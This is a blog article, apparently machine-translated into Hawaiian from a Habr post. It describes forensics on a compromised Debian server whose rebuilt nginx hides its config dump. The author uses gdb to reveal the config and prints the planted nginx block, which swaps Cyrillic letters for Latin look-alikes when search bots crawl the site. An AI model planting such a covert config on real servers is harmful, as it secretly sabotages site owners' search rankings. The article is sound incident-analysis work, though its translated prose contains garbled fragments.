He moʻolelo maikaʻi ʻole i loaʻa i kekahi o koʻu mau hoaaloha. Akā, he mea ʻoluʻolu ʻole ia no Mikhail, he mea leʻaleʻa ia iaʻu.
Pono wau e ʻōlelo he maikaʻi koʻu hoaaloha UNIX-mea hoʻohana: hiki ke hoʻokomo i ka ʻōnaehana iā ia iho mysql, LIKE a hana i nā hoʻonohonoho maʻalahi nginx.
A he ʻumi a hoʻokahi a me ka hapa kāna mau pūnaewele i hoʻolaʻa ʻia i nā mea hana kūkulu.
ʻO kekahi o kēia mau pūnaewele i hoʻolaʻa ʻia i nā chainsaws e noho paʻa i ka TOP o nā ʻenekini huli. He mea loiloi ʻole kēia pūnaewele, akā ua maʻa kekahi i ka hoʻouka ʻana iā ia. ʻO kēlā DDoS, a laila hoʻomāinoino, a laila e kākau lākou i nā ʻōlelo ʻino a hoʻouna i nā hana ʻino i ka mea hoʻokipa a i ka RKN.
I ka manawa koke, ua mālie nā mea a pau a ua lilo kēia mālie i mea maikaʻi ʻole, a hoʻomaka ka pūnaewele e haʻalele mālie i nā laina kiʻekiʻe o nā hopena hulina.
He ʻōlelo kēlā, a laila ka moʻolelo ponoʻī a ke admin.
Ua kokoke e moe i ka wā i kani mai ai ke kelepona: “San, ʻaʻole anei ʻoe e nānā i kaʻu kikowaena? Me he mea lā ua hacked au, ʻaʻole hiki iaʻu ke hōʻoia, akā ʻaʻole i haʻalele ka manaʻo iaʻu no ke kolu o ka pule. Malia paha ʻo ka manawa wale nō ia e loaʻa iaʻu ka lāʻau lapaʻau no ka paranoia?"
ʻO ka mea ma hope mai he hapalua hola kūkākūkā e hiki ke hōʻuluʻulu ʻia penei:
- ua momona loa ka lepo no ka hacking;
- hiki i ka mea hoʻouka ke loaʻa nā kuleana superuser;
- ʻo ka hoʻouka ʻana (inā i hana ʻia) ua kuhikuhi pono ʻia ma kēia pūnaewele;
- ua hoʻoponopono ʻia nā wahi pilikia a pono ʻoe e hoʻomaopopo inā aia kekahi komo;
- ʻAʻole hiki i ka hack ke hoʻopili i ke code pūnaewele a me nā waihona.
E pili ana i ka helu hope.
ʻO ka IP keʻokeʻo mua wale nō ke nānā aku i ka honua. ʻAʻohe hoʻololi ma waena o nā ʻaoʻao hope a me ka ʻaoʻao mua koe wale nō http(s), ʻokoʻa nā mea hoʻohana / ʻōlelo huna, ʻaʻohe kī i hoʻololi ʻia. Ma nā helu ʻāhinahina, pani ʻia nā awa a pau koe 80/443. ʻIke ʻia nā IP backend keʻokeʻo e nā mea hoʻohana ʻelua wale nō, ka mea a Mikhail i hilinaʻi nui ai.
Hoʻokomo ʻia ma ka ʻaoʻao mua Debian 9 a i ka manawa i kāhea ʻia ai, ua hoʻokaʻawale ʻia ka ʻōnaehana mai ka honua e kahi pā ahi waho a hoʻōki.
"ʻAe, hāʻawi mai iaʻu i ke komo," hoʻoholo wau e hoʻopau i ka hiamoe no hoʻokahi hola. "E ʻike wau me koʻu mau maka ponoʻī."
Eia a ʻoi aku:
$ grep -F PRETTY_NAME /etc/*releas*
PRETTY_NAME="Debian GNU/Linux 9 (stretch)"
$ `echo $SHELL` --version
GNU bash, version 4.4.12(1)-release (x86_64-pc-linux-gnu)
$ nginx -v
nginx version: nginx/1.10.3
$ gdb --version
GNU gdb (Debian 8.2.1-2) 8.2.1
Ke ʻimi nei i kahi hack hiki
Hoʻomaka wau i ke kikowaena, ma mua ʻano hoʻopakele. Kau wau i nā diski a hoʻololi iā lākou mana-lāʻau lāʻau, mōʻaukala, nā logs system, a me nā mea ʻē aʻe, inā hiki, e nānā au i nā lā o ka hana ʻana i nā faila, ʻoiai ua maopopo iaʻu ua "holo ʻia" kahi pahū maʻamau ma hope ona, a ua "hehi nui" ʻo Misha i kona ʻimi ʻana iā ia iho. .
Hoʻomaka wau ma ke ʻano maʻamau, ʻaʻole maopopo maoli i ka mea e ʻimi ai, aʻo wau i nā configs. ʻO ka mea mua, hoihoi au nginx no ka mea, ma ka laulā, ʻaʻohe mea ʻē aʻe ma ka ʻaoʻao mua koe wale nō.
He liʻiliʻi nā configs, hoʻonohonoho maikaʻi ʻia i loko o nā faila he ʻumi, nānā wale wau iā lākou popoki'oh pakahi. Me he mea lā ua maʻemaʻe nā mea a pau, akā ʻaʻole ʻoe i ʻike inā ua nele au i kekahi mea komo pū, e ʻae mai iaʻu e hana i kahi papa inoa piha:
$ nginx -T
nginx: the configuration file /usr/local/etc/nginx/nginx.conf syntax is ok
nginx: configuration file /usr/local/etc/nginx/nginx.conf test is successful
ʻAʻole maopopo iaʻu: "ʻAuhea ka papa inoa?"
$ nginx -V
nginx version: nginx/1.10.3
TLS SNI support enabled
configure arguments: --with-cc-opt='-g -O2' --with-ld-opt='-Wl,-z,relro -Wl,-z,now' --prefix=/usr/share/nginx --conf-path=/etc/nginx/nginx.conf --http-log-path=/var/log/nginx/access.log --error-log-path=/var/log/nginx/error.log --lock-path=/var/lock/nginx.lock --pid-path=/run/nginx.pid --modules-path=/usr/lib/nginx/modules --http-client-body-temp-path=/var/lib/nginx/body --http-fastcgi-temp-path=/var/lib/nginx/fastcgi --http-proxy-temp-path=/var/lib/nginx/proxy --http-scgi-temp-path=/var/lib/nginx/scgi --http-uwsgi-temp-path=/var/lib/nginx/uwsgi --with-debug --with-pcre-jit --with-ipv6 --with-http_ssl_module --with-http_stub_status_module --with-http_realip_module --with-http_auth_request_module --with-http_v2_module --with-http_dav_module --with-http_slice_module --with-threads --with-http_addition_module --with-http_gunzip_module --with-http_gzip_static_module --with-http_sub_module --with-stream=dynamic --with-stream_ssl_module --with-mail=dynamic --with-mail_ssl_module
Hoʻohui ʻia kahi nīnau ʻelua i ka nīnau papa inoa: "No ke aha ke ʻano kahiko o ka nginx?"
Eia kekahi, manaʻo ka ʻōnaehana ua hoʻokomo ʻia ka mana hou loa:
$ dpkg -l nginx | grep "[n]ginx"
ii nginx 1.14.2-2+deb10u1 all small, powerful, scalable web/proxy server
Ke kāhea nei au:
- Misha, no ke aha ʻoe i hui hou ai nginx?
- E kali, ʻaʻole wau ʻike pehea e hana ai i kēia!
- ʻAe, e hele e hiamoe ...
Nginx ua maopopo ke kūkulu hou ʻia a hūnā ʻia ka puka o ka papa inoa e hoʻohana ana i ka "-T" no kahi kumu. ʻAʻohe kānalua e pili ana i ka hacking a hiki iā ʻoe ke ʻae wale iā ia a (no ka mea ua hoʻololi ʻo Misha i ke kikowaena me kahi mea hou) e noʻonoʻo i ka pilikia.
A ʻoiai, ʻoiai ua loaʻa i kekahi ke kuleana aa'ah, a laila he mea kūpono wale ke hana hoʻokomo hou i ka ʻōnaehana, a he mea makehewa ka imi ana i ka hewa malaila, aka, i keia manawa, ua lanakila ka hoihoi i ka hiamoe. Pehea mākou e ʻike ai i kā lākou makemake e hūnā mai iā mākou?
E hoʻāʻo kākou e ʻimi:
$ strace nginx -T
Nānā mākou, ʻaʻole lawa nā laina ma ka trace a la
write(1, "/etc/nginx/nginx.conf", 21/etc/nginx/nginx.conf) = 21
write(1, "...
write(1, "n", 1
No ka leʻaleʻa wale, e hoʻohālikelike kākou i nā ʻike.
$ strace nginx -T 2>&1 | wc -l
264
$ strace nginx -t 2>&1 | wc -l
264
Manaʻo wau he ʻāpana o ke code /src/core/nginx.c
case 't':
ngx_test_config = 1;
break;
case 'T':
ngx_test_config = 1;
ngx_dump_config = 1;
break;
ua lawe ʻia i ke ʻano:
case 't':
ngx_test_config = 1;
break;
case 'T':
ngx_test_config = 1;
//ngx_dump_config = 1;
break;
ai ole ia,
case 't':
ngx_test_config = 1;
break;
case 'T':
ngx_test_config = 1;
ngx_dump_config = 0;
break;
no laila ʻaʻole i hōʻike ʻia ka papa inoa e "-T".
Akā pehea mākou e ʻike ai i kā mākou config?
Inā pololei koʻu manaʻo a aia wale nō ka pilikia ma ka loli ngx_dump_config e hoʻāʻo e hoʻokomo iā ia me ka hoʻohana ʻana gdb, laki he kī --me-cc-opt -g i kēia manawa a me ka manaʻolana i ka optimization -O2 ʻaʻole ia e hōʻeha iā mākou. I ka manawa like, ʻoiai ʻaʻole wau ʻike pehea ngx_dump_config hiki ke hana i loko hihia 'T':, ʻaʻole mākou e kāhea i kēia poloka, akā e hoʻokomo iā ia me ka hoʻohana ʻana hihia 't':
No ke aha e hiki ai iā ʻoe ke hoʻohana '-t' a me '-T'Paʻa ʻana inā(ngx_dump_config) hiki i loko inā(ngx_test_config):
if (ngx_test_config) {
if (!ngx_quiet_mode) {
ngx_log_stderr(0, "configuration file %s test is successful",
cycle->conf_file.data);
}
if (ngx_dump_config) {
cd = cycle->config_dump.elts;
for (i = 0; i < cycle->config_dump.nelts; i++) {
ngx_write_stdout("# configuration file ");
(void) ngx_write_fd(ngx_stdout, cd[i].name.data,
cd[i].name.len);
ngx_write_stdout(":" NGX_LINEFEED);
b = cd[i].buffer;
(void) ngx_write_fd(ngx_stdout, b->pos, b->last - b->pos);
ngx_write_stdout(NGX_LINEFEED);
}
}
return 0;
}
ʻOiaʻiʻo, inā hoʻololi ke code i kēia ʻāpana a ʻaʻole i loko hihia 'T':, a laila ʻaʻole e holo kaʻu ala.
E ho'āʻo i ka nginx.confMa hope o ka hoʻoponopono ʻana i ka pilikia ma ka hoʻokolohua, ua hoʻokumu ʻia e koi ʻia kahi hoʻonohonoho haʻahaʻa no ka hana ʻana o ka malware nginx ʻano:
events {
}
http {
include /etc/nginx/sites-enabled/*;
}
E hoʻohana mākou no ka pōkole ma ka ʻatikala.
E hoʻokuʻu i ka debugger
$ gdb --silent --args nginx -t
Reading symbols from nginx...done.
(gdb) break main
Breakpoint 1 at 0x1f390: file src/core/nginx.c, line 188.
(gdb) run
Starting program: nginx -t
[Thread debugging using libthread_db enabled]
Using host libthread_db library "/lib/x86_64-linux-gnu/libthread_db.so.1".
Breakpoint 1, main (argc=2, argv=0x7fffffffebc8) at src/core/nginx.c:188
188 src/core/nginx.c: No such file or directory.
(gdb) print ngx_dump_config=1
$1 = 1
(gdb) continue
Continuing.
nginx: the configuration file /etc/nginx/nginx.conf syntax is ok
nginx: configuration file /etc/nginx/nginx.conf test is successful
# configuration file /etc/nginx/nginx.conf:
events {
}
http {
map $http_user_agent $sign_user_agent
{
"~*yandex.com/bots" 1;
"~*www.google.com/bot.html" 1;
default 0;
}
map $uri $sign_uri
{
"~*/wp-" 1;
default 0;
}
map о:$sign_user_agent:$sign_uri $sign_o
{
о:1:0 o;
default о;
}
map а:$sign_user_agent:$sign_uri $sign_a
{
а:1:0 a;
default а;
}
sub_filter_once off;
sub_filter 'о' $sign_o;
sub_filter 'а' $sign_a;
include /etc/nginx/sites-enabled/*;
}
# configuration file /etc/nginx/sites-enabled/default:
[Inferior 1 (process 32581) exited normally]
(gdb) quit
ʻO kēlā me kēia ʻanuʻu:
- hoʻonoho i kahi haʻihaʻi ma ka hana main ()
- hoʻomaka i ka papahana
- hoʻololi i ka waiwai o ka mea hoʻololi e hoʻoholo i ka puka o ka config ngx_dump_config=1
- hoʻomau/hoʻopau i ka papahana
E like me kā mākou e ʻike ai, ʻokoʻa ka config maoli mai kā mākou, koho mākou i kahi ʻāpana parasitic mai ia mea:
map $http_user_agent $sign_user_agent
{
"~*yandex.com/bots" 1;
"~*www.google.com/bot.html" 1;
default 0;
}
map $uri $sign_uri
{
"~*/wp-" 1;
default 0;
}
map о:$sign_user_agent:$sign_uri $sign_o
{
о:1:0 o;
default о;
}
map а:$sign_user_agent:$sign_uri $sign_a
{
а:1:0 a;
default а;
}
sub_filter_once off;
sub_filter 'о' $sign_o;
sub_filter 'а' $sign_a;
E nānā kākou i nā mea e hana nei ma ke ʻano.
Hoʻoholo ʻia Mea Hoʻohui Mea Piliʻo yandex/google:
map $http_user_agent $sign_user_agent
{
"~*yandex.com/bots" 1;
"~*www.google.com/bot.html" 1;
default 0;
}
Hoʻokaʻawale ʻia nā ʻaoʻao lawelawe wordpress:
map $uri $sign_uri
{
"~*/wp-" 1;
default 0;
}
A no ka poʻe i hāʻule ma lalo o nā kūlana ʻelua i luna
map о:$sign_user_agent:$sign_uri $sign_o
{
о:1:0 o;
default о;
}
map а:$sign_user_agent:$sign_uri $sign_a
{
а:1:0 a;
default а;
}
ma ka kikokikona mana html- hoʻololi nā ʻaoʻao 'O' maluna o 'o' и 'A' maluna o 'a':
sub_filter_once off;
sub_filter 'о' $sign_o;
sub_filter 'а' $sign_a;
Pololei, ʻo ia wale nō ka maʻalahi 'a' != 'a' like me 'o' != 'o':
No laila, loaʻa i nā bots search engine, ma kahi o 100% Cyrillic kikokikona maʻamau, nā ʻōpala i hoʻololi ʻia me ka Latin. 'a' и 'o'. ʻAʻole wau e ʻaʻa e kūkākūkā pehea e pili ai kēia iā SEO, akā ʻaʻole hiki ke loaʻa ka hopena maikaʻi o nā leka i nā kūlana i nā hopena ʻimi.
He aha kaʻu e ʻōlelo ai, e nā kāne me ka noʻonoʻo.
kūmole
Source: www.habr.com